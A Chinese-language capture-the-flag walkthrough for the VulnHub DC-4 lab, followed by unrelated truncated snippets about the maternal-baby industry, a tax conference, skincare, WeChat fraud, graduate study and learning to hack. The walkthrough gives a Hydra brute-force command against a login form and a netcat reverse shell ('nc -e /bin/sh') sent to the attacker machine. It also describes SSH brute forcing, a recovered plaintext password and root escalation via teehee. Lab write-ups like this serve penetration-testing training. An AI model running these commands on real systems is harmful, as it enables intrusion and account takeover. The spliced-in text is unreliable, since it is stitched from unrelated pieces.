靶场名称: DC :4
靶场发布时间:2019-4-7
靶场地址:https://www.vulnhub.com/entry/dc-4,313/
靶场描述:
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
VMware虚拟机(桥接模式)
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务
没有什么明显的信息就 一个登录页面,使用dirb扫描一下目录
没有扫描到什么有用的页面,一些说明文件尝试也没有
对这个登录框进行尝试,sql注入(sqlmap没跑出来),万能密码都尝试一遍,什么都没有(无奈只能暴力破解)
字典使用的/usr/share/wordlists/metasploit/password.lit (时间太长了)
burp跑的太慢了,换一个工具
hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -t 4 192.168.3.32 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
终于进入后台了(暴力破解是真的难受)
命令执行?抓包看一下
抓包执行一下命令
在看一下权限
进行反弹shell,攻击机监听44123端口
nc -lvvp 44123
靶机执行 nc -e /bin/sh 192.168.3.20 44123
用python变换一下交互式shell
这个靶机可以用python,为什么DC3不可以...
在www有一个压缩包解压一下
解压出来是..DC网站的备份
内核版本(没有什么利用价值)
exp尝试一些,都编译不了
root权限的命令也没有可以用
在jim目录中发现一个类似于字典
ssh爆破 jim sam charles 分别爆破(另外的两个没有爆破出来)
用jim账号登录ssh
mbox的内容(邮件内容)
看看系统有没有和mail相关的文件
存在一份jim的邮件,获取到charles的password(^xHhA&hvim0y)
切换到charles账户(查看可以使用的root权限命令)
使用teehee命令添加一个root权限的账号
要问现在最热门的行业是什么,当属母婴行业,母婴行业的发展离不开二胎政策开放的利好信息支持。母婴行业一跃成为近期的投资大热门,新一轮的生育狂潮吹响了号角,带动了消费,发展潜力不用多说,因此吸引了大量的投...
2020年11月26日,由深圳金蝶账无忧网络科技有限公司(以下简称“金蝶账无忧”)主办的2020财税服务行业数字赋能大会在苏州圆满落下帷幕。本次大会以“重构财税服务行业数字战斗力”为主题,特邀中国总会...
双眼是心灵的窗户,是人的视觉效果聚焦点。女士二十五岁之上,肌肤新陈代谢周期时间越来越迟缓,內部胶原和胶原纤维的延展性和延展性减少。最显著的是,她双眼周边的肌肤越来越松驰,皱褶渐渐地产生,让她看上去...
又一微信新型诈骗突然"崛起",很多人资金被盗,赶快告诉家人!无论是微信还是支付宝,现在在我们的生活当中都发挥了重要的作用,我们很喜欢将自己的资金存在上面,一方面使用比较方便,如果是想买一些小的东西的话...
当下,越来越多的人选择了读研,为了一个高学历,也为了一个更高的平台。 然而,选择读研(全日制),也意味着连续几年没有大的收入,仅仅依靠每个月几百的国家补助(低保)是捉襟见肘的。 因此,我们需要开动...
本文目录一览: 1、怎么自学成黑客技术 2、黑客好学吗? 3、我想变成一名黑客(不是骇客)应该怎么做呢? 4、我是一名初中生,请问如何才能成为一名黑客? 5、如何自学成为一名黑客?...